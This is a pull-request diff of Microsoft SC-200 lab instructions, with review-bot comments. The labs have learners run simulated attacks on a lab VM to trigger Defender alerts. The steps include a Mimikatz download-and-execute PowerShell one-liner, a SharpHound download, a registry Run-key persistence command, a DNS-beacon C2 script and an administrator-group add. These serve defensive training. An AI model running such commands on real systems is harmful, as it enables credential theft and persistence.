Merge pull request #251 from KenMAG/master
Fixes issues #235 and #243
KenMAG authored Jan 26, 2024
2 parents bc81f0b + 9d19b7d commit 8f06a55
Showing 5 changed files with 166 additions and 102 deletions.
60 changes: 48 additions & 12 deletions Instructions/Labs/LAB_AK_02_Lab1_Ex2_Mitigate_Attacks.md
Expand Up @@ -14,15 +14,14 @@ You are a Security Operations Analyst working at a company that is implementing

To explore the Defender for Endpoint attack mitigation capabilities, you will run two simulated attacks.


>**Note:** An **[interactive lab simulation](https://mslabs.cloudguides.com/guides/SC-200%20Lab%20Simulation%20-%20Mitigate%20attacks%20with%20Microsoft%20Defender%20for%20Endpoint)** is available that allows you to click through this lab at your own pace. You may find slight differences between the interactive simulation and the hosted lab, but the core concepts and ideas being demonstrated are the same.

### Task 1: Verify Device onboarding

In this task, you will confirm that the device is onboarded successfully and create a test alert.

1. If you are not already at the Microsoft 365 Defender portal in your Microsoft Edge browser, go to (https://security.microsoft.com) and login as Admin for your tenant.
1. If you are not already at the Microsoft Defender XDR portal in your Microsoft Edge browser, go to (https://security.microsoft.com) and login as Admin for your tenant.

1. In the left-hand menu, under the **Assets** area, select **Devices**. Please wait until WIN1 appears in the Devices page before you continue. Otherwise, you might need to repeat this task to see the alerts that will be generated later.

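Review bot: the URL in the rewritten step `If you are not already at the Microsoft Defender XDR portal ... go to (https://security.microsoft.com)` is wrapped in literal parentheses rather than a markdown link, so it renders with stray brackets around the bare URL; since the line is being touched for the product rename anyway, make it `go to [https://security.microsoft.com](https://security.microsoft.com)` and change `login as Admin` to `log in as Admin` (verb, not noun).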
Expand All @@ -38,35 +37,72 @@ In this task, you will confirm that the device is onboarded successfully and cre

1. When the "User Account Control" window is shown, select **Yes** to allow the app to run.

1. Paste the script by right-clicking in the **Administrator: Command Prompt** windows and press **Enter** to run it. **Note:** The window closes automatically after running the script.
1. Paste the script by right-clicking in the **Administrator: Command Prompt** windows and press **Enter** to run it.

>**Note:** The window closes automatically after running the script.
### Task 2: Simulated Attacks

In this task, you will run two simulated attacks to explore the capabilities of Microsoft Defender for Endpoint.
In this task, you will run two *simulated* attacks using *PowerShell* on *WIN1* to explore the capabilities of Microsoft Defender for Endpoint.

`Attack 1: Mimikatz - Credential Dumping`

1. On the *WIN1* machine, type **Command** in the search bar and select **Run as administrator**.

1. Copy and paste the following command in the **Administrator: Command Prompt** window and press **Enter** to run it.

```CommandPrompt
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
```
1. You should see a message that says *Access is denied*, and a pop-up message from `Microsoft Defender Antivirus, Windows Security Virus and threats protection` displaying *Threats found*.
1. Exit the **Administrator: Command Prompt** window by typing **exit** and pressing **Enter**.
`Attack 2: Bloodhound - Collection`
1. On the *WIN1* machine, type **PowerShell** in the search bar, select **Windows PowerShell** and select **Run as administrator**.
1. From the left menu, under **Endpoints**, select **Evaluation & tutorials** and then select **Tutorials & simulations** from the left side.
1. Copy and paste the following commands in the **Administrator: Windows PowerShell** window and press **Enter** to run it.
```PowerShell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
```
>**Note:** It is recommended to copy, paste and run the commands one at a time. You can open *Notepad* and copy the commands into a temporary file to accomplish this. The first command creates a folder named *ExternalPayloads* in the same folder where the *Atomic Red Team* folder is located. The second command downloads the *SharpHound.ps1* file from the *BloodHound* GitHub repository and saves it in the *ExternalPayloads* folder.
1. You should see a pop-up message from `Windows Security Virus and threats protection` displaying *Threats found*.
1. Copy and paste the following command in the **Administrator: Windows PowerShell** window and press **Enter** to run it.
```PowerShell
Test-Path "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
```
1. If the output is *True*, the Malware payload file has not been removed by Microsoft Defender Antivirus. If the output is *False*, the Malware payload file has been removed by Microsoft Defender Antivirus. Use the up-arrow key to repeat the command until the output is *False*.
<!---1. From the left menu, under **Endpoints**, select **Evaluation & tutorials** and then select **Tutorials & simulations** from the left side.
1. Select the **Tutorials** tab.
1. Under *Automated investigation (backdoor)* you will see a message describing the scenario. Below this paragraph, click **Read the walkthrough**. A new browser tab opens which includes instructions to perform the simulation.
1. In the new browser tab, locate the section named **Run the simulation** (page 5, starting at step 2) and follow the steps to run the attack. **Hint:** The simulation file *RS4_WinATP-Intro-Invoice.docm* can be found back in portal, just below the **Read the walkthrough** you selected in the previous step by selecting the **Get simulation file** button.
<!--- 1. Repeat the last 3 steps to run another tutorial, *Automated investigation (fileless attack)*. This is no longer working due to win1 AV --->

1. Repeat the last 3 steps to run another tutorial, *Automated investigation (fileless attack)*. This is no longer working due to win1 AV --->
### Task 3: Investigate the Attacks
1. In the Microsoft 365 Defender portal select **Incidents & alerts** from the left menu bar, then select **Incidents**.
1. In the Microsoft Defender XDR portal select **Incidents & alerts** from the left menu bar, then select **Incidents**.
1. A new incident called "Multi-stage incident..." is in the right pane. Select the incident name to load its details.
1. A new incident called "Multiple threat families detected on one endpoint" is in the right pane. Select the incident name to load its details.
>**Note:** An incident called "Suspicious..." might appear first. This will later be replaced with the aforementioned incident when Microsoft 365 Defender correlates them a single security issue, including the original test alert created in Task 1.
>**Note:** You should see both *Bloodhound* and Mimikatz* alerts in the **Alerts** pane. In **Assets/Devices**, the *win1* computer will now have a **Risk level** of *High*..
1. Select the **Manage incident** button and a new window blade appears.
1. Under **Incident tags** type "Tutorial" and select **Tutorial (Create new)** to create a new tag.
1. Under **Incident tags** type "Simulation" and select **Simulation (Create new)** to create a new tag.
1. Select the toggle **Assign to** and add your user account (Me) as owner of the incident.
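Review bot: the Mimikatz command in Attack 1 still carries the unresolved Atomic Red Team input placeholder `'#{mimurl}'`, so `DownloadString` has no real URL; what the learner observes ("Access is denied" plus the Defender "Threats found" pop-up) comes from the command line itself being blocked, not from a download. If that is intended, say so in the step so readers do not try to substitute a URL; if not, the placeholder must be replaced before merge. The same applies to `PathToAtomicsFolder` in Attack 2: it is a literal string, not a resolved variable, so `New-Item` creates `ExternalPayloads` relative to the current working directory of the PowerShell window, and the note claiming the folder is created "in the same folder where the Atomic Red Team folder is located" is misleading on WIN1, where this lab sets up no such folder. Smaller points in the same hunk: the step `From the left menu, under **Endpoints**, select **Evaluation & tutorials**` sits between opening PowerShell and pasting the SharpHound commands and belongs to the commented-out tutorial flow below, so it must not survive in Attack 2; the `<!---` comment opened before the tutorial steps must not enclose the older `<!--- 1. Repeat the last 3 steps ... --->` line, otherwise the comment closes early and the remaining tutorial text renders; the Task 3 note still reads "Microsoft 365 Defender correlates them a single security issue" (old product name, missing "into"); and the following note has an unbalanced `Mimikatz*` and a double period after *High*.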
Expand All @@ -78,6 +114,6 @@ In this task, you will run two simulated attacks to explore the capabilities of
1. Review the contents of the *Attack story, Alerts, Assets, Investigations, Evidence and Response*, and *Summary* tabs. Devices and Users are under the *Assets* tab. The *Attack story* tab displays the *Incident graph*. The **Hint:** Some tabs might be hidden due the size of your display. Select the ellipsis tab (...) to make them appear.
>**Warning:** The simulations and tutorials here are an excellent source of learning through practice. Simulations and tutorials are being added and edited regularly in the portal. However, some of these simulations & tutorials may interfere with performance of the labs designed for this training course. Only perform the simulations and tutorials recommended in the instructions provided for this lab when using the course provided Azure tenant. You may perform the other simulations and tutorials *after* this training course is complete with this tenant.
>**Warning:** The simulated attacks here are an excellent source of learning through practice. Only perform the attacks in the instructions provided for this lab when using the course provided Azure tenant. You may perform other simulated attacks *after* this training course is complete with this tenant.
## You have completed the lab.
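Review bot: the unchanged `Review the contents of the *Attack story, ...` line in this hunk has a stray "The" before `**Hint:**` and "due the size" should read "due to the size"; since the warning directly below it is being rewritten, fix that line in the same change. In the new warning, "course provided Azure tenant" reads better hyphenated as "course-provided".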
17 changes: 9 additions & 8 deletions Instructions/Labs/LAB_AK_03_Lab1_Ex2_Azure_Defender.md
Expand Up @@ -37,22 +37,23 @@ In this task, you will review Regulatory compliance configuration in Microsoft D

1. Select your subscription.

1. Under *Policy settings*, select **Security policy** in the portal menu.
>**Hint:** Select **Expand all** to find your subscription if you a hierarchy of Management Groups.
1. Scroll down and and review the "Industry & regulatory standards" available to you by default. Note that *ISO 27001* is now deprecated.
1. Under *Settings*, select **Security policy** in the portal menu.

1. Select **Add more standards** to add the updated ISO 27001:2013 regulatory standard.
1. Scroll down and and review the "Security standards" available to you by default.

1. Select the **Add** button to right of *ISO 27001:2013*.
1. Use the search box to find *ISO 27001:2013*.

1. A new page to assign the Azure Policy initiative opens. Confirm that your subscription is selected under *Scope* and click **Review and create**.
1. Select and move the **Status** slider to right of *ISO 27001:2013* to **On**.

1. Select **Create** to assign the Azure Policy initiative to your subscription.
>**Note:** Some standards require you to assign ane Azure Policy initiative.
1. Select Microsoft Defender for Cloud below the search box to return to the main blade.
1. Select **Refresh** on the page menu to confirm that *ISO 27001:2013* is set to *On* for your subscription.

>**Note:** You might want to return later to *Regulatory compliance* to review the new standard controls and recommendations.
1. Close the *Security policies* page by selecting the 'X' on the upper right of the page to go back to the **Environment settings**.

>**Note:** You might want to return later to *Regulatory compliance* to review the new standard controls and recommendations.
### Task 2: Explore Security posture and recommendations

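Review bot: the new step `Scroll down and and review the "Security standards" available to you by default.` carries the doubled "and" over from the line it replaces; fix it here rather than in a later commit. Also in this hunk: the hint `if you a hierarchy of Management Groups` is missing "have"; `move the **Status** slider to right of *ISO 27001:2013*` needs "to the right of"; the note `Some standards require you to assign ane Azure Policy initiative` has "ane" for "an"; and `Select Microsoft Defender for Cloud below the search box to return to the main blade` does not say which control that is (a breadcrumb link, a button?), so name it precisely or drop the step if closing the *Security policies* page, which the later step already does, gets the learner back to **Environment settings**.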
2 changes: 1 addition & 1 deletion Instructions/Labs/LAB_AK_06_Lab1_Ex1_Connect_Services.md
Expand Up @@ -37,7 +37,7 @@ In this task, you will access your Microsoft Sentinel workspace.

1. Select *Create incidents based on Microsoft Defender for Cloud* from the rule templates.

1. Select **Create rule** in the connector information blade.
1. Select **Create rule** in the rule information pane, or select the ellipsis (...) and **+ Create rule**.

1. In the Analytics rule wizard, select **Next: Automated response**, then select **Next: Review and create**.

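Review bot: the new step gives two routes to **Create rule** ("in the rule information pane, or select the ellipsis (...) and **+ Create rule**") without saying when each applies; either keep the one the current portal shows or label them as alternatives for the two portal layouts, otherwise learners will look for a pane that is not there. Style point in the same hunk: the template name on the preceding line is italicised (*Create incidents based on Microsoft Defender for Cloud*) while every other UI element in this hunk is bold.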
146 changes: 73 additions & 73 deletions Instructions/VTD_Demos/00-prerequisites.md
Expand Up @@ -581,98 +581,98 @@ In this task, you will perform attacks on a host with Microsoft Defender for End
1. In the search of the task bar, enter *Command*. Command Prompt will be displayed in the search results. Right-click on the Command Prompt and select **Run as Administrator**. Confirm any User Account Control prompts that appear.

1. In the command prompt, enter the command in each row pressing Enter key after each row:
```
cd \
mkdir temp
cd temp
```

```CommandPrompt
cd \
mkdir temp
cd temp
```
1. Copy and run this command:
```
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "SOC Test" /t REG_SZ /F /D "C:\temp\startup.bat"
```
```CommandPrompt
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "SOC Test" /t REG_SZ /F /D "C:\temp\startup.bat"
```
### Task 2: Create C2 (command and control) attack
1. Login to `WIN1` virtual machine as Admin with the password: **Pa55w.rd**.
1. In the search of the task bar, enter *Command*. Command Prompt will be displayed in the search results. Right-click on the Command Prompt and select **Run as Administrator**. Confirm any User Account Control prompts that appear.
1.
1.
1. Attack 2 - Copy and run this command:

```
notepad c2.ps1
```
Select **Yes** to create a new file and copy the following PowerShell script into c2.ps1 and select **save**.

**Note** Paste into the Virtual Machine might have a limited length. Paste this in three sections to ensure all the script is pasted into the Virtual Machine. Make sure the script looks as it does in these instructions within the notepad c2.ps1 file.

```
param(
[string]$Domain = "microsoft.com",
[string]$Subdomain = "subdomain",
[string]$Sub2domain = "sub2domain",
[string]$Sub3domain = "sub3domain",
[string]$QueryType = "TXT",
[int]$C2Interval = 8,
[int]$C2Jitter = 20,
[int]$RunTime = 240
)
1. Attack 2 - Copy and run this command:
$RunStart = Get-Date
$RunEnd = $RunStart.addminutes($RunTime)
```CommandPrompt
notepad c2.ps1
```
$x2 = 1
$x3 = 1
Do {
$TimeNow = Get-Date
Resolve-DnsName -type $QueryType $Subdomain".$(Get-Random -Minimum 1 -Maximum 999999)."$Domain -QuickTimeout
Select **Yes** to create a new file and copy the following PowerShell script into c2.ps1 and select **save**.
if ($x2 -eq 3 )
{
Resolve-DnsName -type $QueryType $Sub2domain".$(Get-Random -Minimum 1 -Maximum 999999)."$Domain -QuickTimeout
$x2 = 1
>**Note:** Paste into the Virtual Machine might have a limited length. Paste this in three sections to ensure all the script is pasted into the Virtual Machine. Make sure the script looks as it does in these instructions within the notepad c2.ps1 file.
}
else
{
$x2 = $x2 + 1
}
```PowerShell
if ($x3 -eq 7 )
{
Resolve-DnsName -type $QueryType $Sub3domain".$(Get-Random -Minimum 1 -Maximum 999999)."$Domain -QuickTimeout
$x3 = 1
param(
[string]$Domain = "microsoft.com",
[string]$Subdomain = "subdomain",
[string]$Sub2domain = "sub2domain",
[string]$Sub3domain = "sub3domain",
[string]$QueryType = "TXT",
[int]$C2Interval = 8,
[int]$C2Jitter = 20,
[int]$RunTime = 240
)
$RunStart = Get-Date
$RunEnd = $RunStart.addminutes($RunTime)
$x2 = 1
$x3 = 1
Do {
$TimeNow = Get-Date
Resolve-DnsName -type $QueryType $Subdomain".$(Get-Random -Minimum 1 -Maximum 999999)."$Domain -QuickTimeout
if ($x2 -eq 3 )
{
Resolve-DnsName -type $QueryType $Sub2domain".$(Get-Random -Minimum 1 -Maximum 999999)."$Domain -QuickTimeout
$x2 = 1
}
else
{
$x2 = $x2 + 1
}
if ($x3 -eq 7 )
{
Resolve-DnsName -type $QueryType $Sub3domain".$(Get-Random -Minimum 1 -Maximum 999999)."$Domain -QuickTimeout
$x3 = 1
}
else
{
$x3 = $x3 + 1
}
$Jitter = ((Get-Random -Minimum -$C2Jitter -Maximum $C2Jitter) / 100 + 1) +$C2Interval
Start-Sleep -Seconds $Jitter
}
else
{
$x3 = $x3 + 1
}
Until ($TimeNow -ge $RunEnd)
```
$Jitter = ((Get-Random -Minimum -$C2Jitter -Maximum $C2Jitter) / 100 + 1) +$C2Interval
Start-Sleep -Seconds $Jitter
}
Until ($TimeNow -ge $RunEnd)
At the command prompt, enter the following, enter the command in each row pressing Enter key after each row:
```
```PowerShell
.\c2.ps1
```
At the command prompt, enter the following, enter the command in each row pressing Enter key after each row:
```
powershell
.\c2.ps1
```
**Note:** You will see resolve errors. This is to be expected.
Let this command/powershell script run in the background. Don't close the window. The command needs to generate log entries for some hours. You can proceed to the next task and next exercises while this script runs. The data created by this task will be used in the Threat Hunting lab later. This process will not create substantial amounts of data or processing.
>**Note:** You will see resolve errors. This is to be expected.
Let this command/powershell script run in the background. Don't close the window. The command needs to generate log entries for some hours. You can proceed to the next task and next exercises while this script runs. The data created by this task will be used in the Threat Hunting lab later. This process will not create substantial amounts of data or processing.
### Task 2: Attack Windows configured with the Azure Monitor Agent (AMA)
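Review bot: dropping the `powershell` line in front of `.\c2.ps1` at the end of the C2 task is a regression. The window opened in the preceding steps is an `Administrator: Command Prompt` (cmd.exe), and typing `.\c2.ps1` there does not execute the script; cmd hands a `.ps1` to its file association, which is Notepad by default. Either keep `powershell` as the first command, as in the removed block, or change the launch step to open Windows PowerShell as administrator; in the latter case also mention execution policy, because a script run from disk is blocked under the Windows client default of Restricted and nothing on the page sets it (tagging the fence `PowerShell` does not change which shell the learner is in). Other points in this hunk: the heading `### Task 2: Create C2 (command and control) attack` collides with the unchanged `### Task 2: Attack Windows configured with the Azure Monitor Agent (AMA)` that follows, so the C2 task needs its own number; the two empty `1.` items after the User Account Control step are leftovers and render as blank list entries; `At the command prompt, enter the following, enter the command in each row pressing Enter key after each row:` now introduces a single line; and the script's `$Jitter = ((Get-Random -Minimum -$C2Jitter -Maximum $C2Jitter) / 100 + 1) +$C2Interval` evaluates to a sleep between 8.8 and 9.2 seconds with the defaults (8 and 20), i.e. the jitter is +/-0.2 s, not +/-20% of the interval. If a percentage of the interval was intended, use `$Jitter = $C2Interval * (1 + (Get-Random -Minimum -$C2Jitter -Maximum $C2Jitter) / 100)`.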
Expand All @@ -692,6 +692,6 @@ In this task, you will perform attacks on a host with the Security Events connec
net localgroup administrators theusernametoadd /add
```
>**Note**: Make sure there is only one command per line, and you can rerun the commands by changing the username.
>**Note**: Make sure there is only one command per line, and you can rerun the commands by changing the username.
1. In the `Output` window you should see `The command completed successfully` three times
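Review bot: the two `>**Note**: Make sure there is only one command per line...` lines are identical in the rendered view, so this hunk is presumably a whitespace-only change; confirm that is intentional (trailing-space cleanup) rather than an accidental re-save. While here, the unchanged `In the \`Output\` window you should see \`The command completed successfully\` three times` line is missing its final period.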